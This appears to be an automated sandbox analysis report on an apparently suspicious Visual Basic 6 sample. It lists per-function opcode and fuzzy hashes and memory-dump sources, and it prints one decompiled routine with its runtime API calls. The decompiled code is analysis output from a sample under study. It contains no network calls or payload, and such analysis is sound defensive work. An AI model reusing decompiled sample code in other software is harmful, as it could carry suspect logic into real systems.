Instruction Fuzzy Hash: 5A515472A043859FCF348FA8ED957EA77A6EF45390F56411AEC4C9B644D3319A80CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00369ACD, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c769230036c375b0e52a096d6d2ed5138bc2712f20513837c441e0c6b03848
Instruction ID: b4e281e9478887eec49fc7f0ae48bdc5d2a2bad686f10e75d0098fe9ab5c2028
Opcode Fuzzy Hash: d7c769230036c375b0e52a096d6d2ed5138bc2712f20513837c441e0c6b03848
Instruction Fuzzy Hash: 18515472A043859FCF348FB8DD957EA77A6EF44390F56411AEC4C9B644D3319A80CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00369C9B, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed9c574602fb0b18f5a0d817a074944b1290df022e4688fb570f06a8e5527cf
Instruction ID: 3015bbe26485c90097b78ef7517d0e9b399075db33b89c2e9b57da05fe0193b1
Opcode Fuzzy Hash: 9ed9c574602fb0b18f5a0d817a074944b1290df022e4688fb570f06a8e5527cf
Instruction Fuzzy Hash: 2D515472A043899FCF348FA8DE957EA77B6EF45390F56411ADC4C9B644C3319A80CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00362D83, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e623adf6155454bca0e9321986de688f3be6fa8796e8c46cf87c234cc37e04e9
Instruction ID: 3e5e8305b48f9d695e5348964643e0dd9a7d04b19a636c3ab1dc5b0e00f9b568
Opcode Fuzzy Hash: e623adf6155454bca0e9321986de688f3be6fa8796e8c46cf87c234cc37e04e9
Instruction Fuzzy Hash: 5B51CF71A052899FDB71AF28CC95BDB3BB6BFA9310F964119EC8DCB215CB304A41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00369D66, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb38c16bd99a92bbb6e45f43dd5a1ce733ffbb3435130a5a686d823f622b02d7
Instruction ID: ed466369ad48d60cd1162f86dae15dd5c8780debbe13ef4f4d8b277438033173
Opcode Fuzzy Hash: bb38c16bd99a92bbb6e45f43dd5a1ce733ffbb3435130a5a686d823f622b02d7
Instruction Fuzzy Hash: 8751F172A053849FDB348F68D9953EA77A6FF44350F56812ECC4D9B644C3346A81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00369445, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc090ffb9cb811caf8c0ea481baaeda322db76add0190fb9d061e712b3e533b
Instruction ID: 2838092f94e0032e45ce174652af406dd175fb8ad924565f306fdc469dbeba2f
Opcode Fuzzy Hash: 5cc090ffb9cb811caf8c0ea481baaeda322db76add0190fb9d061e712b3e533b
Instruction Fuzzy Hash: DD512471601248CFEF719F2ACC557DA77BBAFA5320F55811BD8098B219CB704A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00369A84, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f20d68793346a275fedcdc190ab5b1e541a8ee89ada361c802e8ef6d5bcbb61
Instruction ID: 770efeb8e82c00d5a70555379db1b63f12e147a526ed5186bf9395301ed3f834
Opcode Fuzzy Hash: 6f20d68793346a275fedcdc190ab5b1e541a8ee89ada361c802e8ef6d5bcbb61
Instruction Fuzzy Hash: 6251E272A053949FDF388F68DD953DA73AAFF48340F56812ADC4D9B644C3346A81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00362672, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08688c149119462953b3db483875b8d513fac90e1af9da1b52eb36ad41b179d5
Instruction ID: 9a59f31738cc54c8cd319207812cbad9b82cefc129f9cab27b826089eb1ddb07
Opcode Fuzzy Hash: 08688c149119462953b3db483875b8d513fac90e1af9da1b52eb36ad41b179d5
Instruction Fuzzy Hash: 6951C0716043999FCB388F24CCA9BEE7BA6BF98340F51402EAC8E9B344C7301A40CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0036B7A1, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e329e8c80f348485c4370dfabfb9c92621e8d6cdc581bdff83362c16cd6af6
Instruction ID: e527730c9348189c5378f8a9d169ab90962caf4f58f9a5286d5b3af979b75fc0
Opcode Fuzzy Hash: 72e329e8c80f348485c4370dfabfb9c92621e8d6cdc581bdff83362c16cd6af6
Instruction Fuzzy Hash: F1411431600389CFCF759EA8C9D83EBB7A2AF55350F92411BDD49CB619D3318A84CE92

Uniqueness

Uniqueness Score: -1.00%

Function 0036AA94, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1518cb9a2e7f67b720877480aafb758f0b78bb64a76bb9975ba1a294f8166cb9
Instruction ID: 3b0eb649671983a0d91d09148a2533b65a4230c3ddc8d31ad3a33c3e2d474245
Opcode Fuzzy Hash: 1518cb9a2e7f67b720877480aafb758f0b78bb64a76bb9975ba1a294f8166cb9
Instruction Fuzzy Hash: C441CC769443C987CB225E789CC96ED7F32AF123A0F748246D8945FA8DE1324A41CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0036A092, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd506bac25d8cb40e8449a02597ef5d0ab1df8246f65d06832c67f73a7412044
Instruction ID: 8865b13dc4a1b6abd59c67cb1a4ed0bbb77fe11ba6db01a28ffe5a6a1269f340
Opcode Fuzzy Hash: fd506bac25d8cb40e8449a02597ef5d0ab1df8246f65d06832c67f73a7412044
Instruction Fuzzy Hash: 8A4136715082488FEB75AF7888567EB3BB6BF95310F51851EDC8AEB108DB704A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0036B883, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd00d22d48330ec299fc87c3cb94d896e4ccefc76c02e3f4709bafe0d88ecd2
Instruction ID: aaf4a4ad5becb40f280dce95d1e987670b5e3545a8f7b7dc592b9ef0ff9bdf3c
Opcode Fuzzy Hash: 6bd00d22d48330ec299fc87c3cb94d896e4ccefc76c02e3f4709bafe0d88ecd2
Instruction Fuzzy Hash: 59314A7250034A8BCF659EB4DDE57EA7771AF813E1F620206DD088F659E3318A84CDC1

Uniqueness

Uniqueness Score: -1.00%

Function 00369FBF, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607db83fd6f1f06fa7cd65b9b006d65e101ede5d5d0ca5c0d821ed84d9d64942
Instruction ID: e18f30fc19b00765e7d838561eaa650afea4b2b6c8008868e93c032ac73a6c94
Opcode Fuzzy Hash: 607db83fd6f1f06fa7cd65b9b006d65e101ede5d5d0ca5c0d821ed84d9d64942
Instruction Fuzzy Hash: 6A31227160524C8FEF72AF288891BDA33B5FF69310F51811AEC88CB209DB340A428B16

Uniqueness

Uniqueness Score: -1.00%

Function 00363008, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0958dfee4664ff9ad682b074e1b429fe461a54f276666fe3f422e2f9dbed4907
Instruction ID: 322e4fd225bb717f0e2ae174bda340563142a6b167c48d9bd37dbc09eadf7ad7
Opcode Fuzzy Hash: 0958dfee4664ff9ad682b074e1b429fe461a54f276666fe3f422e2f9dbed4907
Instruction Fuzzy Hash: 2C3159752043449BCB759F65CD82BEFB6B3EF98310F41822DE88D8B269D7304981CA02

Uniqueness

Uniqueness Score: -1.00%

Function 00364AFC, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6628181f7c479de569370df46af95611acbd90af56ee6f0ce790bb596dcec66f
Instruction ID: 47992e8d670e54ce31362b004f315cc5666b917ec09c4c2f395851ea00178ca0
Opcode Fuzzy Hash: 6628181f7c479de569370df46af95611acbd90af56ee6f0ce790bb596dcec66f
Instruction Fuzzy Hash: 223106750083C597DF329EB8DD91BD93F60AF023A4F148289DD984E1DBF3328141CA82

Uniqueness

Uniqueness Score: -1.00%

Function 003666AE, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8426bea2cad0cf2eb147fba8d76b5bc580ce8399b4f87e3a5569605e95d4e626
Instruction ID: 8941ec6215b66ac217959619bdc25b55806d5c0e817cf2b36bfc1edebd25e2b2
Opcode Fuzzy Hash: 8426bea2cad0cf2eb147fba8d76b5bc580ce8399b4f87e3a5569605e95d4e626
Instruction Fuzzy Hash: E611C132408284DFDBA45F35CE855EEBBEABFD8300F62442EE5C957628C3705682CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0036929E, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa355f6d8271023bac2e803e176b1176c7e1e04fb4016e41b0ede89c0c892c4
Instruction ID: 92a0eaad024aecba02dad070662626c92c89fe4037e378833692ee906d7e8aec
Opcode Fuzzy Hash: 8fa355f6d8271023bac2e803e176b1176c7e1e04fb4016e41b0ede89c0c892c4
Instruction Fuzzy Hash: EA11E978219388CFDB31CF14C984BC977A6BB98700F61806AD849CF3A4C731AA41DF11

Uniqueness

Uniqueness Score: -1.00%

Function 003664E7, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1910b473dea03fe57bde37522d0b1ff9e8bd74b908436c2811610da5b0d3e4f4
Instruction ID: 4dbdbead30e4b0ea90cf06bbd53d3c1b2c2b177047223bc78c49a693af7cd1bf
Opcode Fuzzy Hash: 1910b473dea03fe57bde37522d0b1ff9e8bd74b908436c2811610da5b0d3e4f4
Instruction Fuzzy Hash: 3CC04CB63016808FEA51CB19C992B0073A5F701654F840590D1128B759C224E9108500

Uniqueness

Uniqueness Score: -1.00%

Function 00369889, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00368B74, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a52459949d43250143fec7d0a4008a04d9c5dbc56ad0a5dc633d14aa9021b11e
Instruction ID: 021c695f36ceb9c5040c12ce041f19b6678ee4859f4d0cf99dc331fda71a4910
Opcode Fuzzy Hash: a52459949d43250143fec7d0a4008a04d9c5dbc56ad0a5dc633d14aa9021b11e
Instruction Fuzzy Hash: 1CB00279252685CFC755DF09C190F5173B5FB44751FD154D0E4518BB11C764ED40C910

Uniqueness

Uniqueness Score: -1.00%

Function 0041B1E7, Relevance: 110.7, APIs: 62, Strings: 1, Instructions: 428
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041B1E7(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v32;
				void* _v36;
				long long _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v64;
				char _v76;
				void* _v84;
				signed int _v88;
				char _v92;
				long long _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				signed int _v156;
				signed int _v164;
				char _v172;
				char _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				char _v224;
				signed int _v228;
				intOrPtr* _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				intOrPtr* _v288;
				signed int _v292;
				signed int _v296;
				signed int _t224;
				signed int _t231;
				char* _t236;
				signed int _t242;
				signed int _t247;
				char _t248;
				signed int _t256;
				signed int _t261;
				void* _t335;
				intOrPtr _t336;
				long long* _t337;
				long long _t343;

				_t336 = _t335 - 0x10;
				_push(0x4011c6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t336;
				L004011C0();
				_v20 = _t336;
				_v16 = 0x4011b0;
				_v12 = 0;
				_v8 = 0;
				_push(0x11);
				_push(0x40304c);
				_push( &_v76);
				L004012AA();
				_v100 =  *0x4011a8;
				_v108 = 5;
				_push(0);
				_push( &_v108);
				_push( &_v124);
				L0040126E();
				_v164 = 1;
				_v172 = 0x8002;
				_push( &_v124);
				_t224 =  &_v172;
				_push(_t224);
				L004012E0();
				_v196 = _t224;
				_push( &_v124);
				_push( &_v108);
				_push(2);
				L004012EC();
				_t337 = _t336 + 0xc;
				if(_v196 == 0) {
					_v148 = 0x403028;
					_v156 = 8;
					L004012D4();
					_push(1);
					_push( &_v108);
					_push( &_v124);
					L00401256();
					_v164 = 0x403034;
					_v172 = 0x8008;
					_push( &_v124);
					_t231 =  &_v172;
					_push(_t231);
					L004012E0();
					_v196 = _t231;
					_push( &_v124);
					_push( &_v108);
					_push(2);
					L004012EC();
					if(_v196 != 0) {
						if( *0x41c614 != 0) {
							_v232 = 0x41c614;
						} else {
							_push(0x41c614);
							_push(0x402ed8);
							L00401304();
							_v232 = 0x41c614;
						}
						_v196 =  *_v232;
						_t242 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
						asm("fclex");
						_v200 = _t242;
						if(_v200 >= 0) {
							_v236 = _v236 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x402ec8);
							_push(_v196);
							_push(_v200);
							L00401352();
							_v236 = _t242;
						}
						_v204 = _v92;
						_t247 =  *((intOrPtr*)( *_v204 + 0x58))(_v204,  &_v88);
						asm("fclex");
						_v208 = _t247;
						if(_v208 >= 0) {
							_v240 = _v240 & 0x00000000;
						} else {
							_push(0x58);
							_push(0x402ee8);
							_push(_v204);
							_push(_v208);
							L00401352();
							_v240 = _t247;
						}
						_t248 = _v88;
						_v224 = _t248;
						_v88 = _v88 & 0x00000000;
						L00401322();
						L0040132E();
						_v196 = _v196 & 0x00000000;
						if(_v196 >= 0xc) {
							L00401298();
							_v244 = _t248;
						} else {
							_v244 = _v244 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 1;
						if(_v196 >= 0xc) {
							L00401298();
							_v248 = _t248;
						} else {
							_v248 = _v248 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 2;
						if(_v196 >= 0xc) {
							L00401298();
							_v252 = _t248;
						} else {
							_v252 = _v252 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 3;
						if(_v196 >= 0xc) {
							L00401298();
							_v256 = _t248;
						} else {
							_v256 = _v256 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 4;
						if(_v196 >= 0xc) {
							L00401298();
							_v260 = _t248;
						} else {
							_v260 = _v260 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 5;
						if(_v196 >= 0xc) {
							L00401298();
							_v264 = _t248;
						} else {
							_v264 = _v264 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 6;
						if(_v196 >= 0xc) {
							L00401298();
							_v268 = _t248;
						} else {
							_v268 = _v268 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 7;
						if(_v196 >= 0xc) {
							L00401298();
							_v272 = _t248;
						} else {
							_v272 = _v272 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 8;
						if(_v196 >= 0xc) {
							L00401298();
							_v276 = _t248;
						} else {
							_v276 = _v276 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 9;
						if(_v196 >= 0xc) {
							L00401298();
							_v280 = _t248;
						} else {
							_v280 = _v280 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_v196 = 0xa;
						if(_v196 >= 0xc) {
							L00401298();
							_v284 = _t248;
						} else {
							_v284 = _v284 & 0x00000000;
						}
						L00401292();
						 *((char*)(_v64 + _v196)) = _t248;
						_push(L"1:1:1");
						_push( &_v108);
						L00401316();
						_push( &_v108);
						L0040131C();
						L00401322();
						L00401334();
						if( *0x41c614 != 0) {
							_v288 = 0x41c614;
						} else {
							_push(0x41c614);
							_push(0x402ed8);
							L00401304();
							_v288 = 0x41c614;
						}
						_v196 =  *_v288;
						_t256 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
						asm("fclex");
						_v200 = _t256;
						if(_v200 >= 0) {
							_v292 = _v292 & 0x00000000;
						} else {
							_push(0x14);
							_push(0x402ec8);
							_push(_v196);
							_push(_v200);
							L00401352();
							_v292 = _t256;
						}
						_v204 = _v92;
						_t261 =  *((intOrPtr*)( *_v204 + 0x110))(_v204,  &_v88);
						asm("fclex");
						_v208 = _t261;
						if(_v208 >= 0) {
							_v296 = _v296 & 0x00000000;
						} else {
							_push(0x110);
							_push(0x402ee8);
							_push(_v204);
							_push(_v208);
							L00401352();
							_v296 = _t261;
						}
						_v228 = _v88;
						_v88 = _v88 & 0x00000000;
						L00401322();
						L0040132E();
						L00401250();
					}
				} else {
					_push(0);
					L00401268();
					_v132 = 0x80020004;
					_v140 = 0xa;
					_v116 = 0x80020004;
					_v124 = 0xa;
					_v100 = 0x80020004;
					_v108 = 0xa;
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_t343 =  *0x401150;
					 *_t337 = _t343;
					asm("fld1");
					 *_t337 = _t343;
					asm("fld1");
					 *_t337 = _t343;
					L004012F2();
					_v44 = _t343;
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push(3);
					L004012EC();
					_v100 = 2;
					_v108 = 2;
					_push( &_v108);
					_push( &_v124);
					L00401262();
					_push( &_v124);
					L0040131C();
					L00401322();
					_push( &_v124);
					_push( &_v108);
					_push(2);
					L004012EC();
					_v100 = 1;
					_v108 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v108);
					L0040125C();
					L00401322();
					L00401334();
				}
				asm("wait");
				_push(0x41b940);
				L00401310();
				L00401310();
				L00401310();
				L00401310();
				_v192 =  &_v76;
				_t236 =  &_v192;
				_push(_t236);
				_push(0);
				L00401274();
				L00401310();
				return _t236;
			}

0x0041b1ea
0x0041b1ed
0x0041b1f8
0x0041b1f9
0x0041b205
0x0041b20d
0x0041b210
0x0041b217
0x0041b21e
0x0041b225
0x0041b227
0x0041b22f
0x0041b230
0x0041b23b
0x0041b23e
0x0041b245
0x0041b24a
0x0041b24e
0x0041b24f
0x0041b254
0x0041b25e
0x0041b26b
0x0041b26c
0x0041b272
0x0041b273
0x0041b278
0x0041b282
0x0041b286
0x0041b287
0x0041b289
0x0041b28e
0x0041b29a
0x0041b393
0x0041b39d
0x0041b3b0
0x0041b3b5
0x0041b3ba
0x0041b3be
0x0041b3bf
0x0041b3c4
0x0041b3ce
0x0041b3db
0x0041b3dc
0x0041b3e2
0x0041b3e3
0x0041b3e8
0x0041b3f2
0x0041b3f6
0x0041b3f7
0x0041b3f9
0x0041b40a
0x0041b417
0x0041b434
0x0041b419
0x0041b419
0x0041b41e
0x0041b423
0x0041b428
0x0041b428
0x0041b446
0x0041b45e
0x0041b461
0x0041b463
0x0041b470
0x0041b492
0x0041b472
0x0041b472
0x0041b474
0x0041b479
0x0041b47f
0x0041b485
0x0041b48a
0x0041b48a
0x0041b49c
0x0041b4b4
0x0041b4b7
0x0041b4b9
0x0041b4c6
0x0041b4e8
0x0041b4c8
0x0041b4c8
0x0041b4ca
0x0041b4cf
0x0041b4d5
0x0041b4db
0x0041b4e0
0x0041b4e0
0x0041b4ef
0x0041b4f2
0x0041b4f8
0x0041b505
0x0041b50d
0x0041b512
0x0041b520
0x0041b52b
0x0041b530
0x0041b522
0x0041b522
0x0041b522
0x0041b53a
0x0041b548
0x0041b54a
0x0041b55b
0x0041b566
0x0041b56b
0x0041b55d
0x0041b55d
0x0041b55d
0x0041b575
0x0041b583
0x0041b585
0x0041b596
0x0041b5a1
0x0041b5a6
0x0041b598
0x0041b598
0x0041b598
0x0041b5b0
0x0041b5be
0x0041b5c0
0x0041b5d1
0x0041b5dc
0x0041b5e1
0x0041b5d3
0x0041b5d3
0x0041b5d3
0x0041b5eb
0x0041b5f9
0x0041b5fb
0x0041b60c
0x0041b617
0x0041b61c
0x0041b60e
0x0041b60e
0x0041b60e
0x0041b626
0x0041b634
0x0041b636
0x0041b647
0x0041b652
0x0041b657
0x0041b649
0x0041b649
0x0041b649
0x0041b661
0x0041b66f
0x0041b671
0x0041b682
0x0041b68d
0x0041b692
0x0041b684
0x0041b684
0x0041b684
0x0041b69c
0x0041b6aa
0x0041b6ac
0x0041b6bd
0x0041b6c8
0x0041b6cd
0x0041b6bf
0x0041b6bf
0x0041b6bf
0x0041b6d7
0x0041b6e5
0x0041b6e7
0x0041b6f8
0x0041b703
0x0041b708
0x0041b6fa
0x0041b6fa
0x0041b6fa
0x0041b712
0x0041b720
0x0041b722
0x0041b733
0x0041b73e
0x0041b743
0x0041b735
0x0041b735
0x0041b735
0x0041b74d
0x0041b75b
0x0041b75d
0x0041b76e
0x0041b779
0x0041b77e
0x0041b770
0x0041b770
0x0041b770
0x0041b788
0x0041b796
0x0041b798
0x0041b7a0
0x0041b7a1
0x0041b7a9
0x0041b7aa
0x0041b7b4
0x0041b7bc
0x0041b7c8
0x0041b7e5
0x0041b7ca
0x0041b7ca
0x0041b7cf
0x0041b7d4
0x0041b7d9
0x0041b7d9
0x0041b7f7
0x0041b80f
0x0041b812
0x0041b814
0x0041b821
0x0041b843
0x0041b823
0x0041b823
0x0041b825
0x0041b82a
0x0041b830
0x0041b836
0x0041b83b
0x0041b83b
0x0041b84d
0x0041b865
0x0041b86b
0x0041b86d
0x0041b87a
0x0041b89f
0x0041b87c
0x0041b87c
0x0041b881
0x0041b886
0x0041b88c
0x0041b892
0x0041b897
0x0041b897
0x0041b8a9
0x0041b8af
0x0041b8bc
0x0041b8c4
0x0041b8c9
0x0041b8c9
0x0041b2a0
0x0041b2a0
0x0041b2a2
0x0041b2a7
0x0041b2ae
0x0041b2b8
0x0041b2bf
0x0041b2c6
0x0041b2cd
0x0041b2da
0x0041b2de
0x0041b2e2
0x0041b2e3
0x0041b2eb
0x0041b2ee
0x0041b2f2
0x0041b2f5
0x0041b2f9
0x0041b2fc
0x0041b301
0x0041b30a
0x0041b30e
0x0041b312
0x0041b313
0x0041b315
0x0041b31d
0x0041b324
0x0041b32e
0x0041b332
0x0041b333
0x0041b33b
0x0041b33c
0x0041b346
0x0041b34e
0x0041b352
0x0041b353
0x0041b355
0x0041b35d
0x0041b364
0x0041b36b
0x0041b36d
0x0041b36f
0x0041b371
0x0041b376
0x0041b377
0x0041b381
0x0041b389
0x0041b389
0x0041b8ce
0x0041b8cf
0x0041b903
0x0041b90b
0x0041b913
0x0041b91b
0x0041b923
0x0041b929
0x0041b92f
0x0041b930
0x0041b932
0x0041b93a
0x0041b93f

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0041B205
__vbaAryConstruct2.MSVBVM60(?,0040304C,00000011,?,?,?,?,004011C6), ref: 0041B230
#714.MSVBVM60(?,00000005,00000000), ref: 0041B24F
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B273
__vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?), ref: 0041B289
__vbaOnError.MSVBVM60(00000000,?,?,004011C6), ref: 0041B2A2
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B2FC
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B315
#613.MSVBVM60(?,00000002), ref: 0041B333
__vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041B33C
__vbaStrMove.MSVBVM60(?,?,00000002), ref: 0041B346
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002), ref: 0041B355
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B377
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B381
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B389
__vbaVarDup.MSVBVM60 ref: 0041B3B0
#617.MSVBVM60(?,?,00000001), ref: 0041B3BF
__vbaVarTstNe.MSVBVM60(?,?,?,?,00000001), ref: 0041B3E3
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00000001), ref: 0041B3F9
__vbaNew2.MSVBVM60(00402ED8,0041C614,?,?,?,?,?,004011C6), ref: 0041B423
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 0041B485
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,00000058), ref: 0041B4DB
__vbaStrMove.MSVBVM60(00000000,?,00402EE8,00000058), ref: 0041B505
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,00000058), ref: 0041B50D
__vbaUI1I2.MSVBVM60 ref: 0041B53A
__vbaUI1I2.MSVBVM60 ref: 0041B575
__vbaFreeStr.MSVBVM60(0041B940,?,?,?,?,?,004011C6), ref: 0041B903
__vbaFreeStr.MSVBVM60(0041B940,?,?,?,?,?,004011C6), ref: 0041B90B
__vbaFreeStr.MSVBVM60(0041B940,?,?,?,?,?,004011C6), ref: 0041B913
__vbaFreeStr.MSVBVM60(0041B940,?,?,?,?,?,004011C6), ref: 0041B91B
__vbaAryDestruct.MSVBVM60(00000000,?,0041B940,?,?,?,?,?,004011C6), ref: 0041B932
__vbaFreeStr.MSVBVM60(00000000,?,0041B940,?,?,?,?,?,004011C6), ref: 0041B93A

Strings

1:1:1, xrefs: 0041B798

Memory Dump Source

Source File: 00000006.00000002.684240905.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.684232870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.684280739.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684292158.000000000041F000.00000004.00020000.sdmp Download File
